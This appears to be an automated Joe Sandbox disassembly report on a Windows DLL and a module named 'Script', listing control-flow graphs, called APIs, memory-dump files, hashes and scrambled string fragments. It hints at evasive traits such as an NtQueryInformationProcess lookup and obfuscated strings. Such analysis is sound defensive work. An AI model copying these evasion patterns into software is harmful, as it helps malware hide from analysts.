                                                                                    • Instruction Fuzzy Hash: 1D534736A456118FEB088F7CCDA5BCD37F3BB46350F108695D969DB394D23A8A898F04
                                                                                    APIs
                                                                                    • NtQueryInformationProcess.NTDLL ref: 6E0B7ECF
                                                                                    • GetModuleHandleW.KERNEL32 ref: 6E0B86BE
                                                                                    • GetModuleHandleW.KERNEL32 ref: 6E0B8904
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$InformationProcessQuery
                                                                                    • String ID: %x$%x$&aT$NtQueryInformationProcess$ntdll.dll
                                                                                    • API String ID: 188072037-1314361212
                                                                                    • Opcode ID: 3e9d598a9ba1598ca62ebbb86c5d5030df6d5774703318f7e5c0a4396e52dcfd
                                                                                    • Instruction ID: cbe0f27c719a41db705948f4a66076970ce81cd7bc49ef72b2905d3d3cbcbb14
                                                                                    • Opcode Fuzzy Hash: 3e9d598a9ba1598ca62ebbb86c5d5030df6d5774703318f7e5c0a4396e52dcfd
                                                                                    • Instruction Fuzzy Hash: 5DA23736A405468FEF088EFCC9E53CE7BE2BB42364F149619C415EF7A8D23B85498B15

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1720 6e0c1148-6e0c115b call 6e0c19b0 1723 6e0c115d-6e0c115f 1720->1723 1724 6e0c1161-6e0c1183 call 6e0c1590 1720->1724 1725 6e0c11ca-6e0c11d9 1723->1725 1728 6e0c1185-6e0c11c8 call 6e0c165b call 6e0c1517 call 6e0c1979 call 6e0c11dd call 6e0c17fc call 6e0c11ea 1724->1728 1729 6e0c11f0-6e0c1209 call 6e0c182a call 6e0c19b0 1724->1729 1728->1725 1740 6e0c121a-6e0c1221 1729->1740 1741 6e0c120b-6e0c1211 1729->1741 1744 6e0c122d-6e0c1241 dllmain_raw 1740->1744 1745 6e0c1223-6e0c1226 1740->1745 1741->1740 1743 6e0c1213-6e0c1215 1741->1743 1747 6e0c12f3-6e0c1302 1743->1747 1750 6e0c12ea-6e0c12f1 1744->1750 1751 6e0c1247-6e0c1258 dllmain_crt_dispatch 1744->1751 1745->1744 1748 6e0c1228-6e0c122b 1745->1748 1752 6e0c125e-6e0c1270 call 6e0c0850 1748->1752 1750->1747 1751->1750 1751->1752 1759 6e0c1299-6e0c129b 1752->1759 1760 6e0c1272-6e0c1274 1752->1760 1761 6e0c129d-6e0c12a0 1759->1761 1762 6e0c12a2-6e0c12b3 dllmain_crt_dispatch 1759->1762 1760->1759 1763 6e0c1276-6e0c1294 call 6e0c0850 call 6e0c1148 dllmain_raw 1760->1763 1761->1750 1761->1762 1762->1750 1764 6e0c12b5-6e0c12e7 dllmain_raw 1762->1764 1763->1759 1764->1750
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 6E0C118F
                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6E0C11A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                    • String ID:
                                                                                    • API String ID: 2442719207-0
                                                                                    • Opcode ID: c033ddcc48f9dcce9ab6f2e568e4924810796c6da343baa096e5a6e5249d2c01
                                                                                    • Instruction ID: 1a9314fadc8956e9a94f245f0e7795b265e801ecb61de4394cf450bdb778f37e
                                                                                    • Opcode Fuzzy Hash: c033ddcc48f9dcce9ab6f2e568e4924810796c6da343baa096e5a6e5249d2c01
                                                                                    • Instruction Fuzzy Hash: 7041F472D04619AFDB219FD5CC00BEE3AB9EF45FA5F104519E828A7250D7308D1ADBD2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1770 6e0c11f8-6e0c1209 call 6e0c19b0 1773 6e0c121a-6e0c1221 1770->1773 1774 6e0c120b-6e0c1211 1770->1774 1776 6e0c122d-6e0c1241 dllmain_raw 1773->1776 1777 6e0c1223-6e0c1226 1773->1777 1774->1773 1775 6e0c1213-6e0c1215 1774->1775 1778 6e0c12f3-6e0c1302 1775->1778 1780 6e0c12ea-6e0c12f1 1776->1780 1781 6e0c1247-6e0c1258 dllmain_crt_dispatch 1776->1781 1777->1776 1779 6e0c1228-6e0c122b 1777->1779 1782 6e0c125e-6e0c1270 call 6e0c0850 1779->1782 1780->1778 1781->1780 1781->1782 1785 6e0c1299-6e0c129b 1782->1785 1786 6e0c1272-6e0c1274 1782->1786 1787 6e0c129d-6e0c12a0 1785->1787 1788 6e0c12a2-6e0c12b3 dllmain_crt_dispatch 1785->1788 1786->1785 1789 6e0c1276-6e0c1294 call 6e0c0850 call 6e0c1148 dllmain_raw 1786->1789 1787->1780 1787->1788 1788->1780 1790 6e0c12b5-6e0c12e7 dllmain_raw 1788->1790 1789->1785 1790->1780
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                    • String ID:
                                                                                    • API String ID: 3136044242-0
                                                                                    • Opcode ID: 8ce6fbd56ea1046c9fc650d0ead2cbd9ab17e9e3ff97f1001d0d1edafca340a1
                                                                                    • Instruction ID: afb52db669239dca1b828cf4a24f1b39e10517d647f0c301f6785c69818aaa2e
                                                                                    • Opcode Fuzzy Hash: 8ce6fbd56ea1046c9fc650d0ead2cbd9ab17e9e3ff97f1001d0d1edafca340a1
                                                                                    • Instruction Fuzzy Hash: 97217E76D04219AFDB618ED5C840FAF3AB9EF95F95F004515F8149B210D3308D568BD2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1796 6e0c1041-6e0c1057 call 6e0c19b0 call 6e0c168b 1801 6e0c105d-6e0c1075 call 6e0c1590 1796->1801 1802 6e0c112e 1796->1802 1806 6e0c107b-6e0c108c call 6e0c15ed 1801->1806 1807 6e0c1140-6e0c1147 call 6e0c182a 1801->1807 1804 6e0c1130-6e0c113f 1802->1804 1812 6e0c108e-6e0c10a7 call 6e0c194d call 6e0c150b call 6e0c152f call 6e0c2c71 1806->1812 1813 6e0c10db-6e0c10e9 call 6e0c1124 1806->1813 1830 6e0c10ac-6e0c10b0 1812->1830 1813->1802 1818 6e0c10eb-6e0c10f5 call 6e0c1824 1813->1818 1824 6e0c1116-6e0c111f 1818->1824 1825 6e0c10f7-6e0c1100 call 6e0c174b 1818->1825 1824->1804 1825->1824 1831 6e0c1102-6e0c1114 1825->1831 1830->1813 1832 6e0c10b2-6e0c10b9 call 6e0c15c2 1830->1832 1831->1824 1832->1813 1836 6e0c10bb-6e0c10d8 call 6e0c2c2c 1832->1836 1836->1813
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 6E0C108E
                                                                                      • Part of subcall function 6E0C150B: InitializeSListHead.KERNEL32(6E11F988,6E0C1098,6E0D10D8,00000010,6E0C1029,?,?,?,6E0C1251,?,00000001,?,?,00000001,?,6E0D1120), ref: 6E0C1510
                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E0C10F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                    • String ID:
                                                                                    • API String ID: 3231365870-0
                                                                                    • Opcode ID: 2977293001509cd5719b671b0f0f98b9c3f9f8b97fd214e39713ccf8afc4a681
                                                                                    • Instruction ID: 8fb1cbe527d1613287d60f14921e1d75c75b1d30a781ff990031205b6871dade
                                                                                    • Opcode Fuzzy Hash: 2977293001509cd5719b671b0f0f98b9c3f9f8b97fd214e39713ccf8afc4a681
                                                                                    • Instruction Fuzzy Hash: 39210F32A08205AEDB00ABF4D5157DD37F59F07FACF200859E85A2B6C1CB76440DC6A7

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1839 6e0c5e6d-6e0c5e72 1840 6e0c5e74-6e0c5e8c 1839->1840 1841 6e0c5e8e-6e0c5e92 1840->1841 1842 6e0c5e9a-6e0c5ea3 1840->1842 1841->1842 1843 6e0c5e94-6e0c5e98 1841->1843 1844 6e0c5eb5 1842->1844 1845 6e0c5ea5-6e0c5ea8 1842->1845 1847 6e0c5f13-6e0c5f17 1843->1847 1846 6e0c5eb7-6e0c5ec4 GetStdHandle 1844->1846 1848 6e0c5eaa-6e0c5eaf 1845->1848 1849 6e0c5eb1-6e0c5eb3 1845->1849 1850 6e0c5ec6-6e0c5ec8 1846->1850 1851 6e0c5ed3 1846->1851 1847->1840 1852 6e0c5f1d-6e0c5f20 1847->1852 1848->1846 1849->1846 1850->1851 1853 6e0c5eca-6e0c5ed1 GetFileType 1850->1853 1854 6e0c5ed5-6e0c5ed7 1851->1854 1853->1854 1855 6e0c5ed9-6e0c5ee2 1854->1855 1856 6e0c5ef5-6e0c5f07 1854->1856 1857 6e0c5eea-6e0c5eed 1855->1857 1858 6e0c5ee4-6e0c5ee8 1855->1858 1856->1847 1859 6e0c5f09-6e0c5f0c 1856->1859 1857->1847 1860 6e0c5eef-6e0c5ef3 1857->1860 1858->1847 1859->1847 1860->1847
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6E0C5EB9
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 6E0C5ECB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID:
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: ee6ec76af47af5f07e978199e4cf1eabf58b491d6d3a198182e87ed497a3359b
                                                                                    • Instruction ID: c8f74903a8752a794d11d51d8558beb248a67320d5abf07e7866480fc6270ad3
                                                                                    • Opcode Fuzzy Hash: ee6ec76af47af5f07e978199e4cf1eabf58b491d6d3a198182e87ed497a3359b
                                                                                    • Instruction Fuzzy Hash: 5A11273D618B528BC7784ABE8C9831F7AD59B4B670B34071AD4B5865E5C370C482C206

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1861 6e0c66d0-6e0c66db 1862 6e0c66dd-6e0c66e2 1861->1862 1863 6e0c66e4-6e0c66e6 1861->1863 1864 6e0c66ea 1862->1864 1865 6e0c66ef-6e0c66f2 call 6e0c4436 1863->1865 1866 6e0c66e8 1863->1866 1864->1865 1868 6e0c66f7-6e0c670d call 6e0c4493 1865->1868 1866->1864 1871 6e0c670f-6e0c6733 call 6e0c4436 call 6e0c4493 1868->1871 1872 6e0c673a-6e0c673d 1868->1872 1871->1872 1883 6e0c6735-6e0c6739 1871->1883 1874 6e0c6742-6e0c6775 call 6e0c5c62 1872->1874 1880 6e0c6777-6e0c677a 1874->1880 1881 6e0c6780 1874->1881 1880->1881 1884 6e0c677c-6e0c677e 1880->1884 1882 6e0c6787-6e0c6791 1881->1882 1882->1874 1885 6e0c6793-6e0c6797 1882->1885 1884->1881 1884->1882
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 0ce66a9633916ef365d1d539ccf822f33e27730b808750d0ab3b9e0a02b16198
                                                                                    • Instruction ID: 37584b5aa8b9f5f7d09a2bbb3eca296c81925517af739eb20adbf48862a4f67b
                                                                                    • Opcode Fuzzy Hash: 0ce66a9633916ef365d1d539ccf822f33e27730b808750d0ab3b9e0a02b16198
                                                                                    • Instruction Fuzzy Hash: 66110F71A246016FEB308EB8AD14B9D329AF716FB4F154B16E629DF2C0F374C8C25646

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1886 6e0c4436-6e0c4441 1887 6e0c444f-6e0c4455 1886->1887 1888 6e0c4443-6e0c444d 1886->1888 1890 6e0c446e-6e0c447f RtlAllocateHeap 1887->1890 1891 6e0c4457-6e0c4458 1887->1891 1888->1887 1889 6e0c4483-6e0c448e call 6e0c4423 1888->1889 1897 6e0c4490-6e0c4492 1889->1897 1892 6e0c445a-6e0c4461 call 6e0c6e95 1890->1892 1893 6e0c4481 1890->1893 1891->1890 1892->1889 1899 6e0c4463-6e0c446c call 6e0c6055 1892->1899 1893->1897 1899->1889 1899->1890
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E0C4039,00000001,00000364,00000013,000000FF,?,00000001,6E0C4428,6E0C44B9,?,?,6E0C36CC), ref: 6E0C4477
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 56c075de7becbc2bb33e02f202251fe9df172c0f0347f5c30787bf260cd52f98
                                                                                    • Instruction ID: 410db7b36ab7701dbcd2dffa6004e177b125cd1c9c2473570ec513dde6bcdeae
                                                                                    • Opcode Fuzzy Hash: 56c075de7becbc2bb33e02f202251fe9df172c0f0347f5c30787bf260cd52f98
                                                                                    • Instruction Fuzzy Hash: 2CF090325045257BAB614AE6E804B9F379FFF82FA0B318111A814EB1C8CB70D50286E3

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2006 9e26b0-9e273b call a02320 2010 9e273d-9e2740 2006->2010 2011 9e274b-9e278f call a02320 * 3 2006->2011 2012 9e2746 2010->2012 2013 9e27f5-9e27ff 2010->2013 2027 9e27a3-9e27a5 2011->2027 2016 9e2cd1-9e2cd3 2012->2016 2015 9e2800-9e280b 2013->2015 2015->2015 2018 9e280d-9e2813 2015->2018 2019 9e2e2f-9e2e36 2016->2019 2021 9e2820-9e2827 2018->2021 2021->2021 2024 9e2829-9e2831 2021->2024 2026 9e2840-9e2848 2024->2026 2026->2026 2028 9e284a-9e288f call 9ca300 2026->2028 2029 9e27a7-9e27b7 2027->2029 2030 9e27d4-9e27ef call a02320 2027->2030 2035 9e2890-9e28e9 2028->2035 2037 9e27b9-9e27c5 2029->2037 2038 9e27a0 2029->2038 2030->2013 2030->2016 2035->2035 2039 9e28eb-9e2903 2035->2039 2037->2030 2044 9e27c7-9e27d2 2037->2044 2038->2027 2041 9e2910-9e295a 2039->2041 2041->2041 2043 9e295c-9e2964 2041->2043 2045 9e297b-9e2986 2043->2045 2046 9e2966-9e296b 2043->2046 2044->2038 2048 9e299d 2045->2048 2049 9e2988-9e298f 2045->2049 2047 9e2970-9e2979 2046->2047 2047->2045 2047->2047 2051 9e29a0-9e29a9 2048->2051 2050 9e2990-9e2999 2049->2050 2050->2050 2053 9e299b 2050->2053 2054 9e29bb-9e29c6 2051->2054 2055 9e29ab-9e29af 2051->2055 2053->2051 2057 9e29db-9e2ae9 2054->2057 2058 9e29c8-9e29c9 2054->2058 2056 9e29b0-9e29b9 2055->2056 2056->2054 2056->2056 2060 9e2af0-9e2b04 2057->2060 2059 9e29d0-9e29d9 2058->2059 2059->2057 2059->2059 2060->2060 2061 9e2b06-9e2b0c 2060->2061 2062 9e2b0e-9e2b0f 2061->2062 2063 9e2b1b-9e2b24 2061->2063 2064 9e2b10-9e2b19 2062->2064 2065 9e2b3b-9e2b63 call a02320 2063->2065 2066 9e2b26-9e2b29 2063->2066 2064->2063 2064->2064 2071 9e2ba7-9e2baa 2065->2071 2072 9e2b65-9e2b68 2065->2072 2067 9e2b30-9e2b39 2066->2067 2067->2065 2067->2067 2071->2016 2073 9e2bb0-9e2bdd call 9ca420 call 9e3060 2071->2073 2072->2071 2074 9e2b6a-9e2ba2 call a02320 * 2 2072->2074 2082 9e2e17-9e2e1c 2073->2082 2083 9e2be3-9e2bf0 2073->2083 2074->2019 2085 9e2e1e-9e2e21 2082->2085 2086 9e2e2c 2082->2086 2088 9e2d39-9e2d77 2083->2088 2089 9e2bf6-9e2c0a 2083->2089 2085->2086 2090 9e2e23-9e2e29 call 9ca430 2085->2090 2086->2019 2091 9e2d80-9e2dab 2088->2091 2092 9e2c0e-9e2c1b call 9ca420 2089->2092 2093 9e2c0c 2089->2093 2090->2086 2091->2091 2096 9e2dad-9e2dbb 2091->2096 2105 9e2d2b-9e2d36 2092->2105 2106 9e2c21-9e2c2f 2092->2106 2093->2092 2099 9e2dbd-9e2dcd 2096->2099 2100 9e2e00-9e2e04 2096->2100 2102 9e2dda-9e2dde 2099->2102 2103 9e2e06-9e2e0b call 9e23d0 2100->2103 2104 9e2e54-9e2e5a 2100->2104 2102->2103 2109 9e2de0-9e2ded 2102->2109 2119 9e2e10 2103->2119 2110 9e2e7f-9e2e8a call 9e3060 2104->2110 2111 9e2e5c-9e2e7c 2104->2111 2105->2088 2107 9e2cd8-9e2d06 2106->2107 2108 9e2c35-9e2c37 2106->2108 2117 9e2d08-9e2d14 2107->2117 2118 9e2d17-9e2d28 call 9ca430 2107->2118 2108->2107 2113 9e2c3d-9e2c3f 2108->2113 2114 9e2def-9e2df4 2109->2114 2115 9e2df6-9e2df9 2109->2115 2110->2119 2127 9e2e8c-9e2e9c 2110->2127 2111->2110 2113->2118 2120 9e2c45-9e2c57 2113->2120 2114->2115 2121 9e2dfb-9e2dfe 2115->2121 2122 9e2dd0-9e2dd8 2115->2122 2117->2118 2118->2105 2119->2082 2125 9e2c59-9e2c5b 2120->2125 2126 9e2c70-9e2c78 2120->2126 2121->2122 2122->2100 2122->2102 2129 9e2c5d-9e2c67 2125->2129 2126->2118 2130 9e2c7e-9e2c80 2126->2130 2131 9e2ea2-9e2eb6 2127->2131 2132 9e2ff0-9e3013 2127->2132 2129->2129 2134 9e2c69-9e2c6d 2129->2134 2135 9e2c82-9e2ccd 2130->2135 2136 9e2eba-9e2ec7 call 9ca420 2131->2136 2137 9e2eb8 2131->2137 2133 9e3020-9e3034 2132->2133 2133->2133 2139 9e3036-9e3038 2133->2139 2134->2126 2135->2135 2140 9e2ccf 2135->2140 2143 9e2ecd-9e2edb 2136->2143 2144 9e2fe2-9e2fed 2136->2144 2137->2136 2142 9e3040-9e304b 2139->2142 2140->2118 2145 9e2e40-9e2e52 2142->2145 2146 9e3051-9e3054 2142->2146 2147 9e2f8f-9e2fbd 2143->2147 2148 9e2ee1-9e2ee3 2143->2148 2144->2132 2145->2082 2145->2104 2146->2142 2149 9e3056 2146->2149 2151 9e2fce-9e2fdf call 9ca430 2147->2151 2152 9e2fbf-9e2fcb 2147->2152 2148->2147 2150 9e2ee9-9e2eeb 2148->2150 2149->2145 2150->2151 2154 9e2ef1-9e2f03 2150->2154 2151->2144 2152->2151 2156 9e2f05-9e2f09 2154->2156 2157 9e2f23-9e2f2b 2154->2157 2158 9e2f10-9e2f1a 2156->2158 2157->2151 2159 9e2f31-9e2f35 2157->2159 2158->2158 2160 9e2f1c-9e2f20 2158->2160 2161 9e2f40-9e2f8b 2159->2161 2160->2157 2161->2161 2162 9e2f8d 2161->2162 2162->2151
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: _fV$.kG$7d[Y$QSeh$WnK{$[ptv$\KJQ$_kS_$kRo_$pDyy$rsC@$uwyT$}$(`
                                                                                    • API String ID: 0-3998697038
                                                                                    • Opcode ID: 27ad55660402163be309cecde897e08eff961dcab03b4b84a0161436b4a8c2a8
                                                                                    • Instruction ID: 1b3a3cebff37b802abad6eeeb40b52f1230d10728ecb356169557a5902f5142e
                                                                                    • Opcode Fuzzy Hash: 27ad55660402163be309cecde897e08eff961dcab03b4b84a0161436b4a8c2a8
                                                                                    • Instruction Fuzzy Hash: 3F520570504B818FC736CF36C490B66BBE6BF56314F188A6DD4E68BB92C735A806CB51

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2163 9cb660-9cb6d6 2164 9cb6e0-9cb726 2163->2164 2164->2164 2165 9cb728-9cb73f 2164->2165 2166 9cb740-9cb77e 2165->2166 2166->2166 2167 9cb780-9cb808 2166->2167 2168 9cb810-9cb85d 2167->2168 2168->2168 2169 9cb85f-9cb87f 2168->2169 2170 9cb880-9cb8ac 2169->2170 2170->2170 2171 9cb8ae-9cb8b7 2170->2171 2172 9cb8b9-9cb8bf 2171->2172 2173 9cb8cb-9cb8db 2171->2173 2174 9cb8c0-9cb8c9 2172->2174 2175 9cb8dd 2173->2175 2176 9cb8eb-9cb8f5 2173->2176 2174->2173 2174->2174 2179 9cb8e0-9cb8e9 2175->2179 2177 9cb90b-9cb913 2176->2177 2178 9cb8f7-9cb8fb 2176->2178 2181 9cb92b-9cb935 2177->2181 2182 9cb915-9cb916 2177->2182 2180 9cb900-9cb909 2178->2180 2179->2176 2179->2179 2180->2177 2180->2180 2184 9cb94b-9cb958 2181->2184 2185 9cb937-9cb93b 2181->2185 2183 9cb920-9cb929 2182->2183 2183->2181 2183->2183 2187 9cb95a-9cb95f 2184->2187 2188 9cb96b-9cb9b5 2184->2188 2186 9cb940-9cb949 2185->2186 2186->2184 2186->2186 2189 9cb960-9cb969 2187->2189 2190 9cb9be-9cb9df 2188->2190 2191 9cb9b7-9cb9bd 2188->2191 2189->2188 2189->2189 2192 9cb9e0-9cb9fd 2190->2192 2191->2190 2192->2192 2193 9cb9ff-9cba1f 2192->2193 2194 9cba20-9cba72 2193->2194 2194->2194 2195 9cba74-9cba7b 2194->2195 2196 9cba9d 2195->2196 2197 9cba7d-9cba84 2195->2197 2199 9cbaa0-9cbaa9 2196->2199 2198 9cba90-9cba99 2197->2198 2198->2198 2200 9cba9b 2198->2200 2201 9cbabb-9cbac5 2199->2201 2202 9cbaab-9cbaaf 2199->2202 2200->2199 2204 9cbadb-9cbaf0 2201->2204 2205 9cbac7-9cbacb 2201->2205 2203 9cbab0-9cbab9 2202->2203 2203->2201 2203->2203 2206 9cbad0-9cbad9 2205->2206 2206->2204 2206->2206
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !-',$!8 '$#'+j$)?6~$,89'$.sR)$57\$=$Je;/$O:<;$SU),$^YgQ$rm
                                                                                    • API String ID: 0-1014053324
                                                                                    • Opcode ID: d25dfcdc9693c89f1e464dc5a4bff530a28f12fe39707d4f02b04b7e0586a900
                                                                                    • Instruction ID: 839a37850e71e1494e2775d0d1dbdd79efcb824e6881a9a77d276a6dd53ef353
                                                                                    • Opcode Fuzzy Hash: d25dfcdc9693c89f1e464dc5a4bff530a28f12fe39707d4f02b04b7e0586a900
                                                                                    • Instruction Fuzzy Hash: D1D10871A083914BD315CF3984A176BFFE0AFD2344F18496CE5D55B382D779890ACB92

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2234 9ef2b0-9ef2fb call 9ca420 2237 9ef300-9ef32b 2234->2237 2237->2237 2238 9ef32d-9ef37f 2237->2238 2239 9ef380-9ef3e6 2238->2239 2239->2239 2240 9ef3e8-9ef503 2239->2240 2241 9ef510-9ef550 2240->2241 2241->2241 2242 9ef552-9ef55e 2241->2242 2243 9ef57b-9ef585 2242->2243 2244 9ef560-9ef569 2242->2244 2246 9ef59d 2243->2246 2247 9ef587-9ef58a 2243->2247 2245 9ef570-9ef579 2244->2245 2245->2243 2245->2245 2249 9ef59f-9ef5ab 2246->2249 2248 9ef590-9ef599 2247->2248 2248->2248 2250 9ef59b 2248->2250 2251 9ef5ad-9ef5b3 2249->2251 2252 9ef5cb-9ef5d3 2249->2252 2250->2249 2253 9ef5c0-9ef5c9 2251->2253 2254 9ef5eb-9ef5f7 2252->2254 2255 9ef5d5-9ef5d6 2252->2255 2253->2252 2253->2253 2257 9ef60b-9ef633 call a02240 2254->2257 2258 9ef5f9-9ef5ff 2254->2258 2256 9ef5e0-9ef5e9 2255->2256 2256->2254 2256->2256 2259 9ef600-9ef609 2258->2259 2259->2257 2259->2259
                                                                                    Strings
                                                                                    Memory Dump Source
